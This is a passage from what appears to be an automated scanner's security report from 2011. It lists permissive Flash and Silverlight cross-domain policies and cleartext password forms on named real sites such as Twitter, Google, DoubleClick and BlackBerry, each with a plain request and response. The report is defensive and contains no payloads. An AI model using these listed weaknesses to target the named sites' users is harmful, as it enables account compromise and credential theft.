Date: Sat, 14 May 2011 13:58:28 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"[]>
<cross-domain-policy>
<allow-access-from domain="*.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sapientem.com" secure="false" />
...[SNIP]...
<allow-access-from domain="sapient.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="edge.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="edge-dev.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="localhost" secure="false" />
...[SNIP]...

7.53. http://api.twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 22:34:20 GMT
Server: hi
Status: 200 OK
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sat, 14 May 2011 23:04:20 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

7.54. http://bloxcms.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bloxcms.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bloxcms.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2074952
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:30:00 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0626
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: bloxcms.com
X-TNCMS-Served-By: cmsapp1
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

7.55. http://services.google.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://services.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: services.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 29 Jan 2010 01:57:02 GMT
Date: Sat, 14 May 2011 14:13:27 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="static.googleusercontent.com" />
<allow-access-from domain="74.125.127.100" />
<allow-access-from domain="74.125.77.132" />
<allow-access-from domain="209.85.129.132" />
<allow-access-from domain="216.239.59.132" />
<allow-access-from domain="74.125.95.132" />
<allow-access-from domain="72.14.213.132" />
<allow-access-from domain="72.14.203.132" />
<allow-access-from domain="74.125.153.132" />
<allow-access-from domain="74.125.113.132" />
<allow-access-from domain="74.125.47.132" />
...[SNIP]...

7.56. http://stats.wordpress.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 May 2011 18:06:14 GMT
Content-Type: text/xml
Connection: close
Content-Length: 585
Last-Modified: Fri, 24 Sep 2010 20:06:27 GMT
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" /><allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" /><allow-access-from domain="videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="s0.videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="realeyes.com" to-ports="80,443" />
...[SNIP]...

7.57. https://townnews365-dot-com.bloxcms.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://townnews365-dot-com.bloxcms.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: townnews365-dot-com.bloxcms.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2082872
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:33:05 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0444
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp6
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

7.58. http://twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:13:38 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1305382418687361; path=/; expires=Sat, 21-May-11 14:13:38 GMT; domain=.twitter.com
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sat, 14 May 2011 14:43:38 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

7.59. http://www.stowetoday.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stowetoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stowetoday.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2082628
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:28:57 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0319
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: stowetoday.com
X-TNCMS-Served-By: cmsapp12
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

7.60. http://www.townnews365.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.townnews365.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.townnews365.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2080720
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:30:00 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0536
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp2
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
               "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

8. Silverlight cross-domain policy
There are 8 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


8.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Sat, 14 May 2011 14:23:44 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Sun, 15 May 2011 18:10:09 GMT
Date: Sat, 14 May 2011 18:10:09 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

8.3. http://metrics.blackberry.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.blackberry.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.blackberry.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:23:37 GMT
Server: Omniture DC/2.0.0
xserver: www312
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8.4. http://omni.accenture.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://omni.accenture.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: omni.accenture.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 13:59:41 GMT
Server: Omniture DC/2.0.0
xserver: www44
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8.5. http://pixel.33across.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"335-1298012417000"
Last-Modified: Fri, 18 Feb 2011 07:00:17 GMT
Content-Type: application/xml
Content-Length: 335
Date: Sat, 14 May 2011 18:35:10 GMT
Connection: close
Server: 33XG1

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<gr
...[SNIP]...

8.6. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 22:34:15 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Sat, 21 May 2011 22:34:15 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

8.7. http://stats.wordpress.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 May 2011 18:06:14 GMT
Content-Type: text/xml
Connection: close
Content-Length: 309
Last-Modified: Tue, 22 Mar 2011 14:38:27 GMT
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

8.8. http://yatra.122.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://yatra.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: yatra.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:35:51 GMT
Server: Omniture DC/2.0.0
xserver: www392
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

9. Cleartext submission of password
There are 15 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


9.1. http://appworld.blackberry.com/webstore/content/19736

Summary

Severity:   High
Confidence:   Certain
Host:   http://appworld.blackberry.com
Path:   /webstore/content/19736

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /webstore/content/19736 HTTP/1.1
Host: appworld.blackberry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: RIM
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=86400
Date: Sat, 14 May 2011 14:12:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 202838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script src="/webstore/a
...[SNIP]...
<div>
<form id="deviceModalsForm4" name="deviceModalsForm4" method="post" action="/webstore/content/home.seam" class="awModalMessageForm" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="deviceModalsForm4" value="deviceModalsForm4" />
...[SNIP]...
<td><input id="deviceModalsForm4:inputPassword2" type="password" name="deviceModalsForm4:inputPassword2" value="" maxlength="32" onkeypress="userPin = $F('pin_list'); return enterKeyTrap(event, 'doDeviceChange(\'deviceChangeWindow\',\'' + userPin +'\',\'' + $F('deviceModalsForm4:inputPassword2') +'\')');" disabled="disabled" class="awChangeDevicePasswordField" /></td>
...[SNIP]...

9.2. http://appworld.blackberry.com/webstore/content/19736

Summary

Severity:   High
Confidence:   Certain
Host:   http://appworld.blackberry.com
Path:   /webstore/content/19736

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /webstore/content/19736 HTTP/1.1
Host: appworld.blackberry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: RIM
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=86400
Date: Sat, 14 May 2011 14:12:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 202838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script src="/webstore/a
...[SNIP]...
<div>
<form id="deviceModalsForm1" name="deviceModalsForm1" method="post" action="/webstore/content/home.seam" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="deviceModalsForm1" value="deviceModalsForm1" />
...[SNIP]...
<td><input id="deviceModalsForm1:inputPassword" type="password" name="deviceModalsForm1:inputPassword" value="" maxlength="32" onkeypress="return enterKeyTrap(event, 'doDeviceConnect(\'deviceAuthenticationWindow\',\'' + $F('deviceModalsForm1:inputPassword') + '\')');" /></td>
...[SNIP]...

9.3. http://appworld.blackberry.com/webstore/content/19736

Summary

Severity:   High
Confidence:   Certain
Host:   http://appworld.blackberry.com
Path:   /webstore/content/19736

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /webstore/content/19736 HTTP/1.1
Host: appworld.blackberry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: RIM
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=86400
Date: Sat, 14 May 2011 14:12:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 202838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script src="/webstore/a
...[SNIP]...
<div>
<form id="deviceModalsForm2" name="deviceModalsForm2" method="post" action="/webstore/content/home.seam" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="deviceModalsForm2" value="deviceModalsForm2" />
...[SNIP]...
<td><input id="deviceModalsForm2:inputPassword3" type="password" name="deviceModalsForm2:inputPassword3" value="" maxlength="32" onkeypress="return enterKeyTrap(event, 'doDeviceConnect(\'deviceInvalidPasswordWindow\',\'' + $F('deviceModalsForm2:inputPassword3') + '\')');" /></td>
...[SNIP]...

9.4. http://documents.policybazaar.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://documents.policybazaar.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: documents.policybazaar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 13:52:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3186


<link href="Application_Masters/IN/EN-US/Scripts/styles.css" rel="stylesheet" />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitio
...[SNIP]...
<body>
<form name="form1" method="post" action="Login1.aspx" id="form1">
<div>
...[SNIP]...
<div align="center">
&nbsp;<input name="txtPassword" type="password" id="txtPassword" style="width:230px;" /></div>
...[SNIP]...

9.5. http://documents.policybazaar.com/Login1.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://documents.policybazaar.com
Path:   /Login1.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /Login1.aspx HTTP/1.1
Host: documents.policybazaar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 14 May 2011 14:14:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3186


<link href="Application_Masters/IN/EN-US/Scripts/styles.css" rel="stylesheet" />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitio
...[SNIP]...
<body>
<form name="form1" method="post" action="Login1.aspx" id="form1">
<div>
...[SNIP]...
<div align="center">
&nbsp;<input name="txtPassword" type="password" id="txtPassword" style="width:230px;" /></div>
...[SNIP]...

9.6. http://login.naukri.com/nLogin/Login.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.naukri.com
Path:   /nLogin/Login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /nLogin/Login.php HTTP/1.1
Host: login.naukri.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: naukri.comnginx/0.7.62
Content-Type: text/html
X-Powered-By: PHP/5.2.5
Date: Sat, 14 May 2011 14:13:02 GMT
Content-Length: 25679
Connection: close
Set-Cookie: test=naukri.com; expires=Fri, 09-May-2031 14:12:52 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKRI[ID]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKRI[TOUT]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKRI[RESID]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKRI[NI_FN_HS]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKRI[RS]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKBMS[GENDER]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKBMS[DTOFBIRTH]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKBMS[TOTALEXP]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKBMS[FAREA]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKBMS[INDTYPE]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKBMS[CTC_LACS]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKBMS[CTC_THOUSAND]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKBMS[IMAGEMAP]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly
Set-Cookie: MYNAUKBMS[MISC]=deleted; expires=Fri, 14-May-2010 14:12:51 GMT; path=/; domain=.naukri.com; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Naukri.com Login: Search the best jobs available in In
...[SNIP]...
<!-- un -->
<form method="post" action="" onsubmit="return validateForm()" name="login" style="margin:0;padding:0;">
<input type="hidden" name="formSubmitted" value="0">
...[SNIP]...
</div>
<input name="PASSWORD" type="password" maxlength="40" id="password" style="width:210px; padding:2px;margin-top:5px;" />


<div style="padding-top:10px;" class="cls">
...[SNIP]...

9.7. http://us.blackberry.com/apps-software/appworld/

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /apps-software/appworld/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /apps-software/appworld/ HTTP/1.1
Host: us.blackberry.com
